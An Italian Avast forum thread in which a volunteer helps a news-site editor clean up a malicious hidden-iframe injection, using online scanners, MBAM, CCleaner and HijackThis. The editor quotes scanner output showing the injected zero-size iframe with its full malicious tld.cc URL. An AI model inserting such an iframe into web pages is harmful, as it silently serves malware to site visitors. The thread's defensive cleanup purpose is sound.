Avast WEBforum

Non-English Zone => Italiano => Topic started by: tato75 on October 13, 2012, 09:22:53 PM

Title: Infezione: HTML:Iframe-inf
Post by: tato75 on October 13, 2012, 09:22:53 PM
Ciao a tutti. Spero di non essere off topic o di non ripetere discussioni già aperte... in caso, per favore, indicatemi il topic giusto. Grazie.
Avrei bisogno di una mano per risolvere il problema che vedete nell'oggetto:
Infezione: HTML:Iframe-inf.
Collaboro con un sito di informazione, mi occupo prevalentemente dell'impaginazione e credo di avergli passato un virus (l'ho scoperto solo oggi dopo aver scaricato Avast....). Mi spiego: mi connetti, entro con user e password nella piattaforma e poi gestisco il lavoro sul server. Avast mi ha segnalato un virus nel file AppData che ora dovrebbe aver cancellato, ma mi sa che io l'ho passato, appunto, alle cartelle online.
Qualcuno può darmi infomazioni/dritte/suggerimenti da girare a chi si occupa materialmente delle cartelle del sito che sono sul server, in modo tale da rendergli le cose semplici? Praticamente c'è una intera sezione del sito che io non riesco nemmeno ad aprire perchè Avast me lo blocca a casua dell'infezione che avete letto. Cosa che, comunque, non accadeva con Avira e compagnia: nessuno di questi mi segnalava alcunchè!
Grazie per l'aiuto
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 13, 2012, 09:41:13 PM
Ciao e benvenuto.
Prima di tutto volevo dirti che nessun antivirus ha il 100% dei rilevamenti (un po per discolpare avira etc...) neanche avast.
Comunque, nel box che ti appare durante la navigazione dovresti avere informazioni su dove si trova il virus, dovresti passargli tali informazioni.
Inoltre esistono dei siti come
http://sucuri.net/
http://www.quttera.com/
https://www.virustotal.com/
(quest'ultimo selezionare scansione URL)
che eseguono la scansione del sito e dovrebbero indicarti in che posizione si trova il malaware.
Se in questo modo risolvi bene, altrimenti devi comunicarci l'url malevolo per tentare di capire queal'è il problema (per favore interrompi il collegamento ad esempio cosi hxxp://www.google.com)
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 13, 2012, 10:40:59 PM
Grazie del benvenuto!
Sucuri prima mi dava un malware Iframe che ora invece non c'è più, così come dice che è pulito anche Virustotal. Fatto sta che Avast blocca tutto e tanto per gradire il sito è stato hackerato 20 minuti fa.
hxxp://www.momentosera.it, così ti rendi conto da solo.
E non è la prima volta che accade
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 14, 2012, 12:02:23 PM
Ciao,
analizzando con un tool che ti ho postato e altri questi sono i risultati
http://www.quttera.com/detailed_report/www.momentosera.it
http://www.unmaskparasites.com/security-report/?page=www.momentosera.it/home.php
http://zulu.zscaler.com/submission/show/2f377fd2ca9f2f29a9ab9d07746624ac-1350208564

sembra che ci sia un link potenzialmente malevolo nascosto.
Prova a girare questi dati a chi gestisce il sito per rimuoverlo.

Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 14, 2012, 12:32:00 PM
Ti ringrazio moltissimo, girerò tutto a chi è un pò più esperto...
Intanto non so se hai visto, ma anche un fantomatico gruppo di "pulitori" ha hackerato l'intera homepgae segnalando bug. Che gentili.
Grazie e ancora e buona giornata
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 14, 2012, 12:47:47 PM
Di niente.. spero che risolvano il problema.
Ora anche
http://sitecheck.sucuri.net/results/www.momentosera.it
http://labs.sucuri.net/db/malware/malware-entry-mwdefaced01
rileva che c'è stato un hack nella home page.
ciao
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 14, 2012, 06:12:48 PM
Ti disurbo ancora... anche se non so se a questo punto vado troppo oltre... in questo caso ignorami e scusami.
Comunque... ho passato tutte le informazioni e ci stanno lavorando. Anche se Sucuri ha già cambiato la sua valutazione e ora indica altri Iframe.

Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
 <iframe src="http://hvfodytrnel3476gpsbvgl.tld.cc/links/treat_relates_community.php" width="0" height="0">
 
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
 <iframe src="http://hvfodytrnel3476gpsbvgl.tld.cc/links/treat_relates_community.php" width="0" height="0"></iframe><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
 
Ma una questione inizia a ronzarmi in testa: quando apro un qualunque link hxxp://www.momentosera.it, vado poi su uno degli articoli a caso, per esempio hxxp://www.momentosera.it/articolo.php?id=14525 (i numeri finali sono quelli che indicano l'articolo). Inizialmente lo apro e Avast non dice nulla. Chiudo, riprovo ad aprirlo e Avast lo blocca indicando quanto sotto:

URL: hxxp://www.momentosera.it/articolo.php?id=14525
Infezione: HTM:Iframe-inf
Processo: C:\Program Files (x86)\Internet Explorer\iexplorer.exe

Ma non è che per caso sono io che continuo a "passare" qualcosa? Non a caso la homepage attualmente è composta da un omino giallo e una scritta che indica una sospensione temporanea. Lo vedo con un altro pc (del mio vicino....) e sul mio smartphone, ma questo pc (con cui scrivo e lavoro) mi mostra solo una pagina bianca... Provo col tasto F5 ma non succede nulla uguale...
Piccola aggiunta: alla prima scansione con Avast, in C:....Temp\Local\AppData ..... ecc ecc c'era quel famoso "http://hvfodytrnel3476gpsbvgl.tld.cc/links/treat_relates_community.php" che Sucuri e altri indicano.
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 15, 2012, 06:57:42 PM
Ciao
Quote
Ma una questione inizia a ronzarmi in testa: quando apro un qualunque link hxxp://www.momentosera.it, vado poi su uno degli articoli a caso, per esempio hxxp://www.momentosera.it/articolo.php?id=14525 (i numeri finali sono quelli che indicano l'articolo). Inizialmente lo apro e Avast non dice nulla. Chiudo, riprovo ad aprirlo e Avast lo blocca indicando quanto sotto:
anche io vedo l'omino giallo nella home page e se invece vado qui hxxp://www.momentosera.it/articolo.php?id=14525 avast mi blocca subito la connessione (con FF 16), con IE9 invece non riesco proprio a caricare la pagina..
Non credo che tu stia passando ancora il virus, piuttosto magari prova con un altro browser.
Se non sei sicuro di aver debellato il virus fai con avast una scansione completa all'avvio e poi fanne un'altra completa con MBAM free
http://www.malwarebytes.org/products/malwarebytes_free/
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 15, 2012, 07:22:07 PM
Ciao.
In effetti una scansione all'avvio con Avast l'avevo fatta e non dava nulla.
Ho fatto anche quella con MBAM e ha trovato questo:
trojan. delf    in    C:\ProgramData\lsass.exe

Ho cancellato e ora ne sto rifacendo un'altra per maggiore sicurezza...
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 15, 2012, 07:29:13 PM
Ok, MBAM serve per completare la protezione di avast (come avevo detto all'inizio nessun antivirus...) ed è pienamente compatibile.
Quando hai finito con le scansioni fatti una bella pulizia con ccleaner dei file temporanei
http://www.piriform.com/ccleaner/download
quindi per essere sicuro mandami il log di Hijackthis
http://www.filehippo.com/it/download_hijackthis/
che se vuoi ti controllo è rimasto qualcosa in giro.

ciao

PS
consiglio personale disattiva il ripristino di configurazione del sistema, molti virus si annidano li... ripeto un consiglio.
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 15, 2012, 08:44:28 PM
Con MBAM tutto pulito.
Ho cancellato anche un sacco di roba con ccleaner.
Ti allego il log di Hijackthis (tra l'altro mi dà noie in fase di avvio: dice che c'è un problema con Hosts file, gli dico ok e poi continua da solo).
Grazie

P.S. E come lo disattivo il ripristino di configurazione del sistema?
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 15, 2012, 10:34:36 PM
Bene,
se non sai cosa sia questo cancellalo (selezionandolo in Hijackthis e poi Fix Checked)
Code: [Select]
O4 - HKLM\..\Run: [Setwallpaper] c:\programdata\SetWallpaper.cmd
e anche questi che non sono utili
Code: [Select]
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

Quote
P.S. E come lo disattivo il ripristino di configurazione del sistema?

    Click su bottone Start (il logo di Windows)
    click destro su Computer > Proprietà.
    Ora si aprirà il centro di sicurezza di Windows 7, tra le diverse opzioni cerchiamo Protezione Sistema (si trova sulla sinistra) e facciamo click sopra.
    per accedere al successivo passaggio è necessario avere  i privilegi Admin.
    Ora si aprirà la finestra Proprietà del Sistema come su windows XP
    Selezioniamo l'hdd di sistema (è facile da trovare è quello con la bandierina di Windows)
    facciamo click su Configura poi Disattiva protezione di sistema (io sinceramente ho lasciato "ripristina solo versioni precedenti dei file" funziona come shadow copy http://it.wikipedia.org/wiki/Shadow_Copy).
    Premiamo su OK e Tasto SI per confermare l'alert.


Ho visto che hai installato componenti di Comodo, non hai installato il loro antivirus vero? (può creare conflitto con avast, il solo firewall invece è ok)
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 16, 2012, 08:44:41 AM
Buongiorno.
Credo che il mio Hijackthis non funzioni (forse è il problema che mi segnala in avvio e che ti faccio vedere nella .jpeg). Comunque il primo (Setwallpaper) non lo trova nemmeno più, gli altri tre invece li trova puntualmente, li seleziono, poi Fix Checked: mi dice che ripara/cancella e poi, quando lo lancio nuovamente, eccoli nello stesso punto. Ti allego il nuovo file log.
Per il resto, ho scoperto che il ripristino di configurazione di sistema era già disattivato. Comodo invece sì, ho solo il firewall.
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 16, 2012, 12:45:51 PM
Ok,
si può dare problemi Hijackthis con Win 7...
Prova ad aprire ccleaner, se vai su tools e poi startup, dovresti vedere quelle voci, li le puoi cancellare.
ciao
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 16, 2012, 04:49:18 PM
Buon pomeriggio,
Ok li ho cancellati con CCleaner stavolta
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 16, 2012, 11:09:42 PM
Giogio posso farti una ultima domanda?
Ma Avast può... non so come dire.... tenere in "memoria" un virus e indicare un link infetto anche una volta che non lo è più? Come una sorta di cookie... magari quel "falso positivo" di cui leggo in giro sul forum?
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 17, 2012, 09:10:07 AM
Può darsi, in quel caso si apre una segnalazione di falso positivo, ma sembra che ci sia ancora qualcosa non rimosso nelle pagine degli articoli per esempio
http://www.UnmaskParasites.com/security-report/?page=www.momentosera.it/articolo.php%3Fid%3D14525
Puoi fare controllare?

Ciao
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 17, 2012, 06:44:49 PM
Ciao.
Sta diventando un rebus, perchè ci stanno lavorando e ora
http://www.unmaskparasites.com/security-report/?page=www.momentosera.it/articolo.php%3Fid%3D14525
è pulito (almeno alle 18 e qualcosa, quando cioè ho fatto la scansione io).
Ma Avast continua a bloccarmelo. A chi devo dare retta secondo te?
Idem per altri articoli.
Ma ti dico di più: questo quì hxxp://www.momentosera.it/articolo.php?id=16837, creato dopo gli interventi tecnici, è segnalato come pulito da Unmaskparasites, ma Avast me lo blocca. Andando per tentativi, tra articoli verificati solo con Unmaskparasites e quanto bloccato poi da Avast, incrociando i dati con gli articoli aperti e non aperti dal giornale, con quelli aperti e infettati al "refresh", è evidente che un codice inserito nel programma gestionale "genera" il virus non appena l'articolo stesso viene aperto. Infatti molti articoli erano puliti (per Unmask) finchè non li ho aperti (dal giornale), poi chiudo riapro articolo e Avast lo blocca; infine, dopo qualche ora, su Unmask da puliti passano ad infetti.
Un mio amico, sempre con Avast, lo apre tranquillamente hxxp://www.momentosera.it/articolo.php?id=16837. Anche facendo refresh o cliccando sul link (dieci volte) lo vede perfettamente. A me Avast non me l'ha fatto aprire nemmeno una volta....
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 17, 2012, 07:31:03 PM
Mmmmm... ho visto analizzando il file php della pagina si può notare all'interno dei link
hxxp://www.momentosera.it/articolo.php?id=16837
e
hxxp://www.momentosera.it/articolo.php?id=14525
ci sono ancora tracce del link malevolo
http://urlquery.net/report.php?id=236535
http://wepawet.iseclab.org/view.php?hash=31b15010fd09bd7578f1c0696d6c3bb8&t=1350493900&type=js
con il solito
hxxp://h4rj75u67jnmykjmukly.tld.cc/links/treat_relates_community.php
come vedi poi
http://sitecheck.sucuri.net/results/h4rj75u67jnmykjmukly.tld.cc/links/treat_relates_community.php
è un sito black listato
ciao

ps
non saprei perchè il tuo amico non vede l'avviso di avast.. io ho aperto la pagina e poi con F5 (Aggiorna) mi ha bloccato la connessione.
E' l'ultima versione quella di avast del tuo amico? Magari ha un altro programma di sicurezza o script blocking integrato nel browser che gli blocca la connessione a tale link.
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 17, 2012, 07:40:49 PM
Infatti questo
hxxp://www.momentosera.it/articolo.php?id=16837
ora è infetto dopo qualche ora dal primo controllo.
Ma tu comunque non lo apri, te lo blocca giusto? E allora come è possibile che ad un altro utente con Avast succeda?
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 17, 2012, 07:49:48 PM
Infatti questo
hxxp://www.momentosera.it/articolo.php?id=16837
ora è infetto dopo qualche ora dal primo controllo.
Ma tu comunque non lo apri, te lo blocca giusto? E allora come è possibile che ad un altro utente con Avast succeda?


vedi risposta di prima
Quote

ps
non saprei perchè il tuo amico non vede l'avviso di avast.. io ho aperto la pagina e poi con F5 (Aggiorna) mi ha bloccato la connessione.
E' l'ultima versione quella di avast del tuo amico? Magari ha un altro programma di sicurezza o script blocking integrato nel browser che gli blocca la connessione a tale link.
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 17, 2012, 07:54:27 PM
Ooops scusami... non avevo visto il tuo p.s. sotto l'altra risposta...
Comunque grazie per l'aiuto, davvero.
Dimmi dove ti devo feedbackare  ;D che provvedo subitissimo!
Magari ti informo sull'esito finale delle grandi manovre!!
Buona serata
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 17, 2012, 08:04:57 PM
 :-[ figurati

Si fammi sapere se risolvi,
ciao
Title: Re: Infezione: HTML:Iframe-inf
Post by: tato75 on October 20, 2012, 11:33:21 AM
Ciao buongiorno!
L'odiessea continua...
Intanto abbiamo trovato la radice dell'infezione e il "nostro" hxxp://www.momentosera.it/articolo.php?id=14525 è tornato pulito (il maleware proveniva dai banner, non si è capito ancora se dal modulo di upload del nostro programma gestionale o se da uno dei banner stessi).
Certo se clicchi su HOME poi capisci anche cosa sta succedendo in generale...
Comunque pare che la vera questione alla fine sia: siamo "vecchi". Usiamo il php5 che, pare, sia un colabrodo e le intrusioni sono all'ordine del giorno e alla portata di chiunque abbia un minimo sindacale delle conoscenze hacker!
A te dico di nuovo grazie mille per l'aiuto e di sicuro mi accodo al tuo "I recommend Avast! to everyone!"!
Saluti
Title: Re: Infezione: HTML:Iframe-inf
Post by: giogio on October 21, 2012, 01:36:39 PM
Mi spiace.. si la pagina postata sembra puilta ora e ho visto la home page  :(

Va be, spero risolvi a breve la questione, comuque sono contento di averti dato una mano :)

ciao